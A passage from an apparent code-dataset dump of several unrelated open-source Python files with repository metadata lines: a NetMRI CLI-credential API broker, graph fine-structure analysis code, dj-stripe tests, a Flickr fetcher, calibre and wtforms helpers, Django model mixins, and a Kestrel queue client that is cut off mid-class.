    :return model: The class name of the updated cli credential.
    :rtype model: String

    :return uri: A URI that may be used to retrieve the updated cli credential.
    :rtype uri: String

    :return cli_credential: The updated cli credential.
    :rtype cli_credential: CLICredential
    """
    # Resolve the broker-qualified remote method name once, then forward the
    # caller-supplied fields verbatim to the NetMRI API.
    method_name = self._get_method_fullname("update")
    return self.api_request(method_name, kwargs)
def destroy(self, **kwargs):
    """Deletes the specified cli credential from NetMRI.

    **Inputs**

    :param id: The internal NetMRI identifier for this credential. (required)
    :type id: Integer

    **Outputs**
    """
    # Forward the deletion request to the remote "destroy" endpoint.
    method_name = self._get_method_fullname("destroy")
    return self.api_request(method_name, kwargs)
def test_ssh_telnet(self, **kwargs):
    """Executes a cli credential test and returns results or a status id,
    depending on ``async_ind``.

    **Inputs**

    :param DeviceID: Device ID to specify what device to test cli credentials on (takes precedence over IP address).
    :type DeviceID: Integer

    :param UnitID: ID of the collector to send the request to, OC only.
    :type UnitID: Integer

    :param ip_address: IP Address to test if DeviceID is not given.
    :type ip_address: String

    :param VirtualNetworkID: The ID for Virtual Network, must be unique; only needed if DeviceID is not set.
    :type VirtualNetworkID: Integer

    :param ssh_username: SSH username.
    :type ssh_username: String

    :param ssh_password: SSH password.
    :type ssh_password: String

    :param telnet_username: Telnet username.
    :type telnet_username: String

    :param telnet_password: Telnet password.
    :type telnet_password: String

    :param enable_password: Enable mode password.
    :type enable_password: String

    :param async_ind: When false, the credential test runs synchronously and this call blocks until it completes. When true, a credential test id is returned for use in subsequent status calls. (default: False)
    :type async_ind: Boolean

    **Outputs**

    :return text: When async_ind is false, the credential test text, returned upon completion.
    :rtype text: String

    :return id: The internal identifier for a previously initiated credential test (async mode).
    :rtype id: String
    """
    # Resolve the broker-qualified remote method name once, then issue
    # the API call with the caller-supplied parameters.
    method_name = self._get_method_fullname("test_ssh_telnet")
    return self.api_request(method_name, kwargs)
def test_ssh_telnet_status(self, **kwargs):
    """Retrieve the status/output of a previously started CLI credential test.

    **Inputs**

    :param id: Credential test id needed to retrieve status. (required)
    :type id: String

    :param start: The starting index (inclusive) of the returned text of the credential test. (required)
    :type start: Integer

    **Outputs**

    :return text: Credential test result text.
    :rtype text: String

    :return start: The starting index (inclusive) of the returned text of the credential test.
    :rtype start: Integer

    :return end: The ending index (exclusive) of the returned text of the credential test.
    :rtype end: Integer
    """
    # Forward the status poll to the remote endpoint.
    method_name = self._get_method_fullname("test_ssh_telnet_status")
    return self.api_request(method_name, kwargs)
| infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v3_4_0/cli_credential_broker.py | Python | apache-2.0 | 56,135 |
"""fsa.py
This modules implements fine-structure analysis of undirected
graphs with (numeric) vertex attributes. It further contains
functionality to estimate the feature distribution using Gaussian
mixture models, or to build a Bag-of-Words representation from
a collection of feature vectors.
The idea of fine-structure analysis was recently proposed in
[1] Macindoe, O. and W. Richards, "Graph Comparison Using Fine
Structure Analysis". In: Social Computing '10
Note: We do not implement the LBG features of [1]; Our graph
features include a subset of the features proposed in [2]
[2] Li. G. et al., "Graph Classification via Topological and Label
Attributes". In: MLG '11
as well as some additional generic features available in networkx.
"""
__license__ = "Apache License, Version 2.0"
__author__ = "Roland Kwitt, Kitware Inc., University of Salzburg, 2013"
__email__ = "E-Mail: roland.kwitt@kitware.com"
__status__ = "Development"
# Graph handling
import networkx as nx
from networkx.algorithms import bipartite
# Machine learning
import sklearn.mixture.gmm as gm
from sklearn.cluster import KMeans
from collections import defaultdict
# Misc.
import logging
import numpy as np
import scipy.sparse
import time
import sys
import os
# Per-(sub)graph feature extractors: each entry maps a networkx graph to a
# single scalar, and together they define the feature vector produced by
# compute_graph_features(). Commented-out entries were evaluated but are
# disabled (mostly expensive eccentricity/spectrum computations).
attr_list = [# Average degree
             lambda g : np.mean([e for e in g.degree().values()]),
             # Average eccentricity
             #lambda g : np.mean([i for i in nx.eccentricity(g).values()]),
             # Average closeness centrality
             #lambda g : np.mean([e for e in nx.closeness_centrality(g).values()]),
             # Percentage of isolated points (i.e., degree(v) = 1)
             lambda g : float(len(np.where(np.array(nx.degree(g).values())==1)[0]))/g.order(),
             # Spectral radius (i.e., largest AM eigenvalue)
             #lambda g : np.abs(nx.adjacency_spectrum(g))[0],
             # Spectral trace (i.e., sum of abs. eigenvalues)
             # lambda g : np.sum(np.abs(nx.adjacency_spectrum(g))),
             # Label entropy, as defined in [2]
             lambda g : label_entropy([e[1]['type'] for e in g.nodes(data=True)]),
             # Mixing coefficient of attributes
             lambda g : np.linalg.det(nx.attribute_mixing_matrix(g,'type')),
             # Avg. #vertics with eccentricity == radius (i.e., central points)
             # lambda g : np.mean(float(len(nx.center(g)))/g.order()),
             # Link impurity, as defined in [2]
             lambda g : link_impurity(g)]
             # Diameter := max(eccentricity)
             # lambda g : nx.diameter(g),
             # Radius := min(eccentricity)
             #lambda g : nx.radius(g)]
def link_impurity(g):
    """Compute link impurity of a vertex-labeled graph.

    The link impurity is the fraction of edges connecting vertices whose
    'type' attributes differ, see [2].

    Parameters
    ----------
    g : networkx Graph
        Input graph with an integer vertex attribute stored as 'type'.

    Returns
    -------
    impurity : float
        Link impurity in [0, 1]; 0 for single-vertex or edgeless graphs.
    """
    if len(g.nodes()) == 1:
        return 0
    edges = g.edges()
    # BUGFIX: a graph with several vertices but no edges previously raised
    # ZeroDivisionError below; such a graph trivially has no impure links.
    if not edges:
        return 0
    # Endpoint labels, aligned per edge.
    u = np.array([g.node[a]['type'] for (a, b) in edges])
    v = np.array([g.node[b]['type'] for (a, b) in edges])
    # An edge is "impure" exactly when its endpoint labels differ (u - v != 0).
    return float(len(np.nonzero(u - v)[0])) / len(edges)
def label_entropy(labels):
    """Compute the Shannon entropy of a label vector.

    Parameters
    ----------
    labels : numpy array, shape (L,)
        The input labels (non-negative integers).

    Returns
    -------
    entropy : float
        Entropy of the label vector, see [2].
    """
    # Histogram of label occurrences; zero-count bins carry no information.
    counts = np.bincount(labels)
    observed = counts[np.nonzero(counts)].astype(float)
    p = observed / observed.sum()
    return np.abs(-(p * np.log(p)).sum())
def graph_from_file(graph_file, label_file=None, n_skip=0):
    """Load graph from an ASCII file containing adjacency information.

    Parameters
    ----------
    graph_file : string
        Filename of the file containing all the adjacency information. Format
        of the adjacency matrix file is as follows:

            [Header, optional]
            0 1 1
            1 0 0
            0 1 0

        Interpretation: 3x3 adjacency matrix, e.g., with an edge between
        vertices (0,1) and (0,2), etc.
    label_file : string
        Filename of the label information file. Here is an example:

            [Header, optional]
            5
            2
            1

        Interpretation: 3 labels, v_0 label: 5, v_1 label: 2 and v_2 label: 1.
    n_skip : int (default: 0)
        Skip n header lines.

    Returns
    -------
    G : networkx Graph
        Graph with one vertex per adjacency-matrix row; when a label file is
        given, each vertex carries its label in the 'type' attribute.

    Raises
    ------
    Exception
        If either input file does not exist, or the number of labels does
        not match the number of vertices.
    """
    logger = logging.getLogger()

    if not os.path.exists(graph_file):
        raise Exception("Graph file %s not found!" % graph_file)

    # Load adjacency information and binarize any weights >= 1 to 1.
    adj_info = np.genfromtxt(graph_file, skip_header=n_skip)
    adj_info[np.where(adj_info >= 1)] = 1

    G = nx.Graph(adj_info)

    if label_file is not None:
        if not os.path.exists(label_file):
            # BUGFIX: the original message used the "%d" conversion on a
            # string argument, raising TypeError instead of the intended
            # "file not found" exception.
            raise Exception("Label file %s not found!" % label_file)

        labels = np.genfromtxt(label_file, skip_header=n_skip)
        logger.debug("Loaded labelfile %s!" % label_file)

        if len(labels) != len(G):
            raise Exception("Size mismatch for labels!")
        # Attach each label as the 'type' attribute of the matching vertex.
        for idx, l in enumerate(labels):
            G.node[idx]['type'] = int(l)

    logger.debug("Built graph from %s with %d vertices." %
                 (graph_file, len(G)))
    return G
def compute_graph_features(g, radius=2, sps=None, omit_degenerate=False, run_global=False):
    """Compute graph feature vector(s).

    Parameters
    ----------
    g : networkx input graph with N vertices
        The input graph on which we need to compute graph features.
    radius: int (default: 2)
        Compute graph features from local neighborhoods of vertices,
        where the notion of neighborhood is defined by the number of
        hops to the neighbor, i.e., the radius. This assumes that the
        initial edge weights when computing the shortest-paths are 1.
    sps: numpy matrix, shape (N, N) (default : None)
        Matrix of shortest-path information for the graph g.
    omit_degenerate : boolean (default: False)
        Currently, degenerate cases are subgraphs with just a single
        vertex. If 'omit_degenerate' is 'True', these subgraphs are
        not considered. Otherwise, the feature vector for such a sub-
        graph is just a vector of zeros.
    run_global: boolean (default : False)
        Compute a GLOBAL graph descriptor using the defined features.

    Returns
    -------
    v_mat : numpy matrix, shape (N, D)
        A D-dimensional feature matrix with one feature vector for
        each vertex. Features are computed for the given radius. In
        case run_global is True, N=1. Rows for degenerate vertices are
        removed when omit_degenerate is True.
    """
    logger = logging.getLogger()

    # Global feature computation: one descriptor for the whole graph.
    if run_global:
        v = [attr_fun(g) for attr_fun in attr_list]
        v_mat = np.zeros((1,len(attr_list)))
        v_mat[0,:] = np.asarray(v)
        return v_mat

    # Recompute shortest paths if necessary (all-pairs, unit edge weights).
    if sps is None:
        sps = nx.floyd_warshall_numpy(g)

    # Feature matrix representation of graph: one row per vertex.
    # NOTE(review): indexing v_mat by the node object assumes nodes are the
    # integers 0..N-1 (true for graphs built by graph_from_file) -- confirm
    # before using with arbitrarily-labeled graphs.
    v_mat = np.zeros([len(g),len(attr_list)])

    # Iterate over all nodes
    degenerates = []
    for n in g.nodes():
        # Get n-th row of shortest path matrix
        nth_row = np.array(sps[n,:]).ravel()
        # Find elements within a certain radius (hop count <= radius)
        within_radius = np.where(nth_row <= radius)
        # Build a subgraph from those nodes
        sg = g.subgraph(within_radius[0])
        # Single vertex sg is considered degenerate
        if len(sg.nodes()) == 1:
            # Keep track of degenerates so their rows can be pruned below
            degenerates.append(n)
            if omit_degenerate:
                continue
            # Feature vector is 0-vector
            v = np.zeros((len(attr_list),))
        else:
            v = [attr_fun(sg) for attr_fun in attr_list]
        v_mat[n,:] = np.asarray(v)
    logger.info("Found %d degenerate cases!" % len(degenerates))
    # Remove the (all-zero) rows of degenerate vertices in one pass.
    if len(degenerates):
        logger.info("Pruning %d degenerate cases ..." % len(degenerates))
        v_mat = np.delete(v_mat, degenerates, axis=0)
    logger.debug("Computed (%d x %d) feature matrix." %
                 (v_mat.shape[0], v_mat.shape[1]))
    return v_mat
def run_fsa(data, radii=None, recompute=True, out=None, skip=0,
            omit_degenerate=False, run_global=False):
    """Run (f)ine-(s)tructure (a)nalysis.

    Parameters
    ---------
    data : list of N 3-tuples of (graph file, label file, class
        index). We iterate over this list and compute fine-structure
        topological features for each graph.
    radii : list of 'int'
        The desired neighborhood radii.
    recompute: bool (default : True)
        Recompute features, otherwise try to load them from disk.
        In case we try to load from disk, filenames are constructed
        based on the value of the 'out' parameter.
    out : string (default : None)
        Base file name for the generated data files, e.g.,
        '/tmp/data'. Two files will be written to disk:

            /tmp/data.mat
            /tmp/data.idx

        where 'data.mat' contains the feature matrix, i.e., one
        feature vector per vertex; 'data.idx' contains the indices
        that identify which graph each feature vector belongs to;
    skip : int (default : 0)
        Skip N header entries when loading graphs.
    omit_degenerate : boolean (default: False)
        Currently, degenerate cases are subgraphs with just a single
        vertex. If 'omit_degenerate' is 'True', these subgraphs are
        not considered. Otherwise, the feature vector for such a sub-
        graph is just a vector of zeros.
    run_global : boolean (default : False)
        Compute a GLOBAL graph descriptor using the defined features.

    Returns
    -------
    A dict with keys 'data_mat' (numpy matrix, one feature row per
    vertex, len(radii)*D columns) and 'data_idx' (per-row index of the
    graph that produced the row).
    """
    logger = logging.getLogger()

    if radii is None:
        raise Exception("No radii given!")

    if not out is None:
        mat_file = "%s.mat" % out
        idx_file = "%s.idx" % out

    # Optionally serve cached features from a previous run.
    # NOTE(review): with recompute=False and out=None, mat_file/idx_file are
    # undefined here -- callers must pass 'out' whenever recompute is False.
    if not recompute:
        if (os.path.exists(mat_file) and
            os.path.exists(idx_file)):
            logger.info("Loading data from file(s).")
            data_mat = np.genfromtxt(mat_file)
            data_idx = np.genfromtxt(idx_file)
            return {'data_mat' : data_mat,
                    'data_idx' : data_idx}

    data_mat = []
    data_idx = []
    for idx, (cf, lf, lab) in enumerate(data):
        logger.info("Processing %d-th graph ..." % idx)
        T, x = graph_from_file(cf, lf, skip), []
        if run_global:
            # if run_global is True, all other parameters do NOT matter!
            x.append(compute_graph_features(T, 0, None, None, run_global))
        else:
            # One feature block per radius; blocks are stacked column-wise.
            for r in radii:
                x.append(compute_graph_features(T, r, None, omit_degenerate))
        xs = np.hstack(tuple(x))
        data_mat.append(xs)
        # Row i of data_idx records which graph produced feature row i.
        data_idx.append(np.ones((xs.shape[0], 1))*idx)

    data_mat = np.vstack(tuple(data_mat))
    data_idx = np.vstack(tuple(data_idx))

    if not out is None:
        np.savetxt(mat_file, data_mat, delimiter=' ')
        np.savetxt(idx_file, data_idx, delimiter=' ',fmt="%d")

    return {'data_mat' : data_mat,
            'data_idx' : data_idx}
def estimate_gm(X, components=3, seed=None):
    """Estimate a Gaussian mixture model.

    Note: Uses diagonal covariance matrices.

    Parameters
    ----------
    X : numpy matrix, shape (N, D)
        Matrix of data samples (i-th row is the i-th sample vector).
    components : int (default : 3)
        Number of desired mixture components.
    seed : int (default : None)
        Seed for the random number generator.

    Returns
    -------
    gm_obj : sklearn.mixture.gmm object
        Estimated GMM, fitted to X.
    """
    logger = logging.getLogger()

    n_samples, n_dims = X.shape
    logger.info("Estimating %d-comp. GMM from (%d x %d) ..." %
                (components, n_samples, n_dims))

    # Diagonal covariances keep the parameter count linear in D.
    model = gm.GMM(n_components=components,
                   covariance_type='diag',
                   random_state=seed)
    model.fit(X)
    return model
def learn_codebook(X, codebook_size=200, seed=None):
    """Learn a codebook.

    Run K-Means clustering to compute a codebook. K-Means is initialized
    by K-Means++, uses a max. of 500 iterations and 10 re-initializations.

    Parameters
    ---------
    X : numpy matrix, shape (N, D)
        Input data.
    codebook_size : int (default : 200)
        Desired number of codewords.
    seed : int (default : None)
        Seed for random number generator.

    Returns
    -------
    cb : sklearn.cluster.KMeans object
        KMeans object after fitting.
    """
    logger = logging.getLogger()
    logger.info("Learning codebook with %d words ..." % codebook_size)

    # Vector quantization: cluster centers become the codewords.
    quantizer = KMeans(codebook_size,
                       init="k-means++",
                       n_init=10,
                       max_iter=500,
                       random_state=seed)
    quantizer.fit(X)
    return quantizer
def bow(X, cb):
    """Compute a (normalized) Bag-of-Words histogram.

    Parameters
    ----------
    X : numpy matrix, shape (N, D)
        Input data.
    cb : sklearn.cluster.KMeans
        Already estimated codebook with C codewords.

    Returns
    -------
    H : numpy array, shape (C,)
        Normalized BoW histogram.
    """
    # Number of codewords and their dimensionality.
    n_words, dim = cb.cluster_centers_.shape
    if dim != X.shape[1]:
        raise Exception("Dimensionality mismatch!")

    # Assign every sample to its closest codeword ...
    assignments = cb.predict(X)

    # ... and histogram the assignments over all codeword bins.
    bins = range(0, n_words + 1)
    return np.histogram(assignments, bins=bins, density=True)[0]
def pp_gmm(X, models, argmax=True):
    """Compute the posterior probability of X under a set of GMM models.

    Parameters
    ----------
    X : numpy matrix, shape (N,D)
        Data samples.
    models : list of sklearn.mixture.gmm objects
        List of C estimated GMMs.
    argmax : boolean (default : True)
        If 'True', the index of the class (represented by
        its model) with the highest a-posteriori probability
        is computed. If 'False', the a-posteriori probability
        of each class (represented by the model) is computed for
        each row in X. Note: We assume equal prior probabilities
        for each class.

    Returns
    -------
    maxp : numpy.int64, or np.array with shape (N, C)
        Depending on whether 'argmax' is 'True' or
        'False', the index of the class with the highest
        a-posteriori probability is returned, or the
        a-posteriori probabilities under each model (for
        each feature vector in X).
    """
    n,d = X.shape
    n_models = len(models)

    # ll[i, j] = per-sample log-likelihood of sample i under model j.
    ll = np.zeros((n,n_models),dtype="float32")
    for i, model in enumerate(models):
        ll[:,i] = np.asarray(model.score(X)).ravel()

    if argmax:
        # Column-wise sum: total log-likelihood of ALL samples per model.
        sump = np.sum(ll,axis=0)
        # LogSumExp to compute MAP (numerically stable normalization)
        t0 = np.max(sump)
        t1 = np.exp(sump - (np.log(np.sum(np.exp(sump - t0))) + t0))
        max_idx = np.argmax(t1)
        return max_idx
    else:
        # LogSumExp to compute row-wise MAP: normalize each sample's
        # likelihoods across models (equal priors assumed).
        t0 = np.asmatrix(np.max(ll,axis=1)).transpose()
        t1 = np.log(np.sum(np.exp(ll - np.tile(t0,(1,n_models))),axis=1)) + t0
        prob = np.exp(np.asmatrix(ll) - t1)
        return prob
| rkwitt/pyfsa | core/fsa.py | Python | apache-2.0 | 15,682 |
"""
.. module:: dj-stripe.tests.test_integrations.test_sync
:synopsis: dj-stripe Sync Method Tests.
.. moduleauthor:: Alex Kavanaugh (@kavdev)
"""
import sys
from django.conf import settings
from django.test.testcases import TestCase
from django.contrib.auth import get_user_model
from djstripe.models import Charge
from djstripe.sync import sync_subscriber
from unittest.case import skip
# These tests will be converted to sync tests on the customer model
# The whole suite is disabled: the ``if False`` guard (together with the
# @skip decorator) keeps these legacy tests from running until they are
# ported to sync tests on the customer model (see module comment above).
if False:
    @skip
    class TestSyncSubscriber(TestCase):

        def setUp(self):
            # One subscriber shared by every test in this class.
            self.user = get_user_model().objects.create_user(username="testsync", email="testsync@test.com")

        def test_new_customer(self):
            customer = sync_subscriber(self.user)
            charges = Charge.objects.filter(customer=customer)
            # There shouldn't be any items attached to the customer
            self.assertEqual(0, len(charges), "Charges are unexpectedly associated with a new customer object.")

        def test_existing_customer(self):
            # Syncing twice must be idempotent and return the same customer.
            customerA = sync_subscriber(self.user)
            customerB = sync_subscriber(self.user)
            self.assertEqual(customerA, customerB, "Customers returned are not equal.")

        def test_bad_sync(self):
            customer = sync_subscriber(self.user)
            customer.stripe_id = "fake_customer_id"
            customer.save()
            sync_subscriber(self.user)
            # NOTE(review): reading sys.stdout.getvalue() assumes stdout has
            # been replaced by a StringIO buffer (e.g. unittest buffer mode)
            # -- confirm before re-enabling this test.
            self.assertEqual("ERROR: No such customer: fake_customer_id", sys.stdout.getvalue().strip())

        def test_charge_sync(self):
            # Initialize stripe
            import stripe
            stripe.api_key = settings.STRIPE_SECRET_KEY
            customer = sync_subscriber(self.user)
            charges = Charge.objects.filter(customer=customer)
            # There shouldn't be any items attached to the customer
            self.assertEqual(0, len(charges), "Charges are unexpectedly associated with a new customer object.")
            token = stripe.Token.create(
                card={
                    "number": '4242424242424242',
                    "exp_month": 12,
                    "exp_year": 2016,
                    "cvc": '123'
                },
            )
            customer.update_card(token.id)
            stripe.Charge.create(
                amount=int(10 * 100),  # Convert dollars into cents
                currency="USD",
                customer=customer.stripe_id,
                description="Test Charge in test_charge_sync",
            )
            customer = sync_subscriber(self.user)
            charges = Charge.objects.filter(customer=customer)
            self.assertEqual(1, len(charges), "Unexpected number of charges associated with a new customer object.")
| mthornhill/dj-stripe | tests/test_integrations/test_sync.py | Python | bsd-3-clause | 2,774 |
# -*- coding: utf-8 -*-
# This file is part of PyBOSSA.
#
# PyBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBOSSA. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import re
import json
import string
def get_flickr_photos(size="big"):
    """
    Gets public photos from Flickr feeds

    NOTE(review): the ``size`` parameter is currently unused -- both the
    medium and big URLs are always returned for each photo.

    :arg string size: Size of the image from Flickr feed.
    :returns: A list of photos (dicts with 'link', 'url_m', 'url_b' keys).
    :rtype: list
    """
    # Get the ID of the photos and load it in the output var
    # add the 'ids': '25053835@N03' to the values dict if you want to
    # specify a Flickr Person ID
    print('Contacting Flickr for photos')
    url = "http://api.flickr.com/services/feeds/photos_public.gne"
    values = {'nojsoncallback': 1,
              'format': "json"}
    query = url + "?" + urllib.urlencode(values)
    urlobj = urllib2.urlopen(query)
    data = urlobj.read()
    urlobj.close()
    # The returned JSON object by Flickr is not correctly escaped,
    # so we have to fix it see
    # http://goo.gl/A9VNo
    regex = re.compile(r'\\(?![/u"])')
    fixed = regex.sub(r"\\\\", data)
    output = json.loads(fixed)
    print('Data retrieved from Flickr')
    # For each photo ID create its direct URL according to its size:
    # big, medium, small (or thumbnail) + Flickr page hosting the photo
    photos = []
    for idx, photo in enumerate(output['items']):
        # CONSISTENCY: print as a function call (works on Python 2 and 3)
        # to match every other message in this function; this line was a
        # bare Python 2 print statement.
        print('Retrieved photo: %s' % idx)
        imgUrl_m = photo["media"]["m"]
        # IDIOM: use the str method instead of the deprecated
        # string.replace() module function.
        imgUrl_b = imgUrl_m.replace("_m.jpg", "_b.jpg")
        photos.append({'link': photo["link"], 'url_m': imgUrl_m,
                       'url_b': imgUrl_b})
    return photos
if __name__ == '__main__':
    # Fetch the public photos first, then dump them as a JSON task file.
    # ROBUSTNESS: the file handle is now managed by a context manager, so
    # it is closed even if json serialization fails, and no empty file is
    # created when the Flickr request itself fails.
    photos = get_flickr_photos()
    with open('flickr_tasks.json', 'w') as task_file:
        task_file.write(json.dumps(photos))
| NaturalHistoryMuseum/pybossa-beetles | get_images.py | Python | agpl-3.0 | 2,353 |
#!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
class NullSmarts(object):
    """No-op "smarts" provider.

    Used when an editor's syntax has no dedicated smart-behaviour
    implementation: every hook returns an empty or negative result, so
    callers can invoke the interface unconditionally.
    """

    def __init__(self, editor):
        # The editor handle is not needed by the null implementation.
        pass

    def get_extra_selections(self, editor):
        # No extra highlight selections are provided.
        return tuple()

    def get_smart_selection(self, editor, update=True):
        # Fall back to the editor's plain selection.
        return editor.selected_text

    def verify_for_spellcheck(self, cursor, highlighter):
        # Nothing is eligible for spell checking.
        return False

    def cursor_position_with_sourceline(self, cursor, for_position_sync=True):
        # No source-line mapping is available.
        return (None, None)

    def goto_sourceline(self, editor, sourceline, tags, attribute=None):
        # Source-line navigation is unsupported.
        return False

    def get_inner_HTML(self, editor):
        # No inner-HTML extraction is possible.
        return None
| sharad/calibre | src/calibre/gui2/tweak_book/editor/smart/__init__.py | Python | gpl-3.0 | 811 |
import sys
# Python 3: text unifies on ``str``; dict views and ``zip`` are already
# lazy, so the portability helpers are thin aliases.
if sys.version_info[0] >= 3:
    text_type = str
    string_types = str,
    iteritems = lambda o: o.items()
    itervalues = lambda o: o.values()
    izip = zip
else:
    # Python 2: keep ``unicode``/``basestring`` and the lazy iterator APIs.
    text_type = unicode
    string_types = basestring,
    iteritems = lambda o: o.iteritems()
    itervalues = lambda o: o.itervalues()
    from itertools import izip
def with_metaclass(meta, base=object):
    """Create a temporary base class with metaclass *meta*.

    Inheriting from the returned class applies *meta* to the subclass on
    both Python 2 and Python 3 without version-specific syntax.
    """
    temporary_name = "NewBase"
    return meta(temporary_name, (base,), {})
| xsleonard/wtforms | wtforms/compat.py | Python | bsd-3-clause | 430 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import uuid
from django.db import models
class TimestampedModelMixin(models.Model):
    """ TimestampedModelMixin

    An abstract base class model that provides self-managed "created" and
    "updated" fields.
    """
    # Set once on INSERT (auto_now_add); indexed for chronological queries.
    created = models.DateTimeField(auto_now_add=True, editable=False, db_index=True)
    # Refreshed on every save() (auto_now); indexed for "recently changed" queries.
    updated = models.DateTimeField(auto_now=True, editable=False, db_index=True)

    class Meta:
        # Abstract: no table of its own; fields are inherited by concrete models.
        abstract = True
class UUIDModelMixin(models.Model):
    """ UUIDModelMixin

    An abstract base class model that provides a self-managed "uuid" field.
    """
    # Random UUID4 assigned on creation; indexed for lookup by external id.
    uuid = models.UUIDField(default=uuid.uuid4, editable=False, db_index=True)

    class Meta:
        # Abstract: no table of its own; field is inherited by concrete models.
        abstract = True
| hzlf/openbroadcast.ch | app/base/models/mixins.py | Python | gpl-3.0 | 755 |
#!/usr/bin/env python
"""
A Kestrel client library.
"""
from collections import defaultdict
import re
import memcache
class Client(object):
    """Kestrel queue client.

    Wraps a memcache-protocol connection to a kestrel server; every
    operation is bound to the single queue name given at construction.
    Kestrel encodes per-read options into the key name (e.g. "queue/t=10",
    "queue/open", "queue/close").
    """

    def __init__(self, servers, queue):
        """Constructor.

        :param servers: The list of servers to connect to, really should only
            be one for a kestrel client;
        :type servers: list
        :param queue: The name of the key to work against
        :type queue: string
        """
        self.__memcache = KestrelMemcacheClient(servers=servers)
        self.queue = queue

    def add(self, data, expire=None):
        """Add a job onto the queue.

        WARNING: You should only send strings through to the queue, if not
        the python-memcached library will serialize these objects and since
        kestrel ignores the flags supplied during a set operation, when the
        object is retrieved from the queue it will not be unserialized.

        :param data: The job itself
        :type data: mixed
        :param expire: The expiration time of the job, if a job doesn't get
            used in this amount of time, it will silently die away.
        :type expire: int
        :return: True/False
        :rtype: bool
        """
        # kestrel treats expire=0 as "never expire".
        if expire is None:
            expire = 0

        # python-memcached's set() returns 0 on failure.
        ret = self.__memcache.set(self.queue, data, expire)
        if ret == 0:
            return False
        return True

    def get(self, timeout=None):
        """Get a job off the queue. (unreliable)

        :param timeout: The time to wait for a job if none are on the queue
            when the initial request is made. (seconds)
        :type timeout: int
        :return: The job
        :rtype: mixed
        """
        cmd = '%s' % (self.queue)
        if timeout is not None:
            cmd = '%s/t=%d' % (cmd, timeout)
        return self.__memcache.get('%s' % (cmd))

    def next(self, timeout=None):
        """Marks the last job as complete and gets the next one.

        NOTE: despite the name this is not the Python iterator protocol;
        it issues a combined "close/open" reliable read against the queue.

        :param timeout: The time to wait for a job if none are on the queue
            when the initial request is made. (seconds)
        :type timeout: int
        :return: The job
        :rtype: mixed
        """
        cmd = '%s/close' % (self.queue)
        if timeout is not None:
            cmd = '%s/t=%d' % (cmd, timeout)
        return self.__memcache.get('%s/open' % (cmd))

    def peek(self, timeout=None):
        """Copy a job from the queue, leaving the original in place.

        :param timeout: The time to wait for a job if none are on the queue
            when the initial request is made. (seconds)
        :type timeout: int
        :return: The job
        :rtype: mixed
        """
        cmd = '%s/peek' % (self.queue)
        if timeout is not None:
            cmd = '%s/t=%d' % (cmd, timeout)
        return self.__memcache.get(cmd)

    def abort(self):
        """Mark a job as incomplete, making it available to another client.

        :return: True on success
        :rtype: boolean
        """
        self.__memcache.get('%s/abort' % (self.queue))
        return True

    def finish(self):
        """Mark the last job read off the queue as complete on the server.

        :return: True on success
        :rtype: bool
        """
        self.__memcache.get('%s/close' % (self.queue))
        return True

    def delete(self):
        """Delete this queue from the kestrel server.

        :return: True on success, False on error
        :rtype: bool
        """
        # python-memcached's delete() returns 0 on failure.
        ret = self.__memcache.delete(self.queue)
        if ret == 0:
            return False
        return True

    def close(self):
        """Force the client to disconnect from the server.

        :return: True
        :rtype: bool
        """
        self.__memcache.disconnect_all()
        return True

    def flush(self):
        """Clear out (remove all jobs) in the current queue.

        :return: True
        :rtype: bool
        """
        self.__memcache.flush(self.queue)
        return True

    def flush_all(self):
        """Clears out all jobs in all the queues on this kestrel server.

        :return: True
        :rtype: bool
        """
        self.__memcache.flush_all()
        return True

    def reload(self):
        """Forces the kestrel server to reload the config.

        :return: True
        :rtype: bool
        """
        self.__memcache.reload()
        return True

    def stats(self):
        """Get the stats from the server and parse the results into a python
        structure.

        :return: A tuple ``(server, {'server': {...}, 'queues': {...}})``
            where 'server' maps global stat names to (mostly numeric)
            values and 'queues' maps each queue name to its stat dict;
            ``None`` if no server responded.
        :rtype: tuple or None
        """
        server = None
        _sstats = {}
        _qstats = {}
        # Global (non queue_*) counters come from the memcache STATS reply;
        # values are coerced to long where possible.
        for server, stats in self.raw_stats():
            server = server.split(' ', 1)[0]
            for name, stat in stats.iteritems():
                if not name.startswith('queue_'):
                    try:
                        _sstats[name] = long(stat)
                    except ValueError:
                        _sstats[name] = stat
        # Per-queue blocks are parsed out of kestrel's DUMP_STATS text,
        # which looks like: queue 'name' { key=value ... }
        for name, stats in re.findall('queue \'(?P<name>.*?)\' \{(?P<stats>.*?)\}', self.raw_stats(True), re.DOTALL):
            _stats = {}
            for stat in [stat.strip() for stat in stats.split('\n')]:
                if stat.count('='):
                    (key, value) = stat.split('=')
                    _stats[key] = long(value)
            _qstats[name] = _stats
        if server is None:
            return None
        return (server, dict([('server', _sstats), ('queues', _qstats)]))

    def raw_stats(self, pretty=None):
        """Get statistics in either the pretty (kestrel) format or the
        standard memcache format.

        :param pretty: Set to True to generate the stats in the kestrel/pretty
            format.
        :type pretty: bool
        :return: The stats text blob, or the structured format from the
            underlying memcache library
        :rtype: string
        """
        if pretty is True:
            return self.__memcache.pretty_stats()
        return self.__memcache.get_stats()

    def shutdown(self):
        """Shutdown the kestrel server gracefully.

        :return: None
        :rtype: None
        """
        return self.__memcache.shutdown()

    def version(self):
        """Get the version for the kestrel server.

        :return: The kestrel server version. e.g. 1.2.3
        :rtype: string
        """
        return self.__memcache.version()
class KestrelMemcacheClient(memcache.Client):
    """memcache.Client subclass that speaks kestrel's protocol extensions.

    Kestrel accepts a handful of commands that are not part of the plain
    memcached protocol (RELOAD, FLUSH, DUMP_STATS, DUMP_CONFIG, SHUTDOWN),
    and memcache.Client also lacks a VERSION helper; this class adds them.
    """

    def reload(self):
        for server in self.servers:
            if server.connect():
                server.send_cmd('RELOAD')
                server.expect('OK')

    def flush(self, key):
        for server in self.servers:
            if server.connect():
                server.send_cmd('FLUSH %s' % (key))
                server.expect('OK')

    def pretty_stats(self):
        return self.__read_cmd('DUMP_STATS')

